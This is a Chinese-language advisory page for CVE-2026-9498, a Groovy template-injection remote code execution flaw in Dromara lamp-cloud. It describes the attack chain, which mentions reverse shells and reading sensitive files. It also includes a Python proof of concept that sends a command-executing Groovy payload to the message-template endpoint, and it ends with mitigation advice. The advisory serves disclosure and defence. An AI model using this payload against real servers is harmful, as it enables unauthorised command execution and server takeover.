CVE-2026-9498 CVSS 6.3 中危

CVE-2026-9498 Dromara lamp-cloud 模板注入漏洞

披露日期: 2026-05-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9498

漏洞类型

模板注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Dromara lamp-cloud

漏洞概述

Dromara lamp-cloud 5.6.2及以下版本存在安全漏洞。该漏洞源于组件Message Template Handler中的GroovyClassLoader.parseClass函数未能正确中和DefMsgTemplate.content参数中的特殊元素，导致模板引擎注入。攻击者可利用此漏洞发起远程攻击，且已有公开的利用代码披露，厂商尚未对此做出回应，存在较高安全风险。

技术细节

该漏洞的核心在于Dromara lamp-cloud的Message Template Handler组件在处理消息模板时，直接使用了GroovyClassLoader.parseClass方法来解析用户提供的模板内容。具体来说，受影响的接口参数DefMsgTemplate.content未经过滤或严格的校验便被传递给了Groovy脚本引擎。由于Groovy语言的动态特性，攻击者可以在该字段中构造恶意的Groovy代码片段（如调用系统命令）。当服务器端调用parseClass解析该内容时，恶意代码会被服务器执行，从而导致远程代码执行（RCE）。攻击者无需用户交互即可利用此漏洞，执行任意系统命令，进而控制服务器。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统使用的是Dromara lamp-cloud 5.6.2或更早版本，并确认存在受影响的Message Template Handler接口。

STEP 2

构造Payload

攻击者构造包含恶意Groovy代码的数据，利用DefMsgTemplate.content参数，编写旨在执行系统命令的Groovy脚本（如反弹Shell或读取敏感文件）。

STEP 3

发送请求

攻击者通过网络向受影响的接口发送特制的数据包，将恶意代码注入到模板内容中。

STEP 4

代码执行

服务器端接收到请求后，GroovyClassLoader.parseClass函数解析并执行了传入的恶意模板内容，导致攻击者在服务器端获得命令执行权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Hypothetical endpoint)
target_url = "http://target-host/api/message/template"

# Malicious Groovy payload to execute 'whoami' command
# The payload uses Groovy's execute() method to run shell commands
payload_content = '''
def cmd = "whoami"
def proc = cmd.execute()
proc.waitFor()
println "Output: ${proc.text}"
'''

# JSON data structure reflecting the vulnerable parameter
data = {
    "DefMsgTemplate": {
        "content": payload_content
    }
}

try:
    # Sending the POST request with the malicious payload
    response = requests.post(target_url, json=data, timeout=10)
    
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Dromara lamp-cloud <= 5.6.2

防御指南

临时缓解措施

建议立即限制对Message Template Handler接口的网络访问权限，仅允许可信IP调用。同时，应检查系统日志中是否存在针对DefMsgTemplate.content参数的异常请求，作为入侵检测的临时手段。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9498
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9498
3 Details https://www.cvedetails.com/cve/CVE-2026-9498/
4 VulDB https://vuldb.com/cve/CVE-2026-9498
5 Link https://github.com/Ku4D3/bug_story/blob/main/report_02.md
6 Link https://vuldb.com/submit/814103
7 Link https://vuldb.com/vuln/365481
8 Link https://vuldb.com/vuln/365481/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表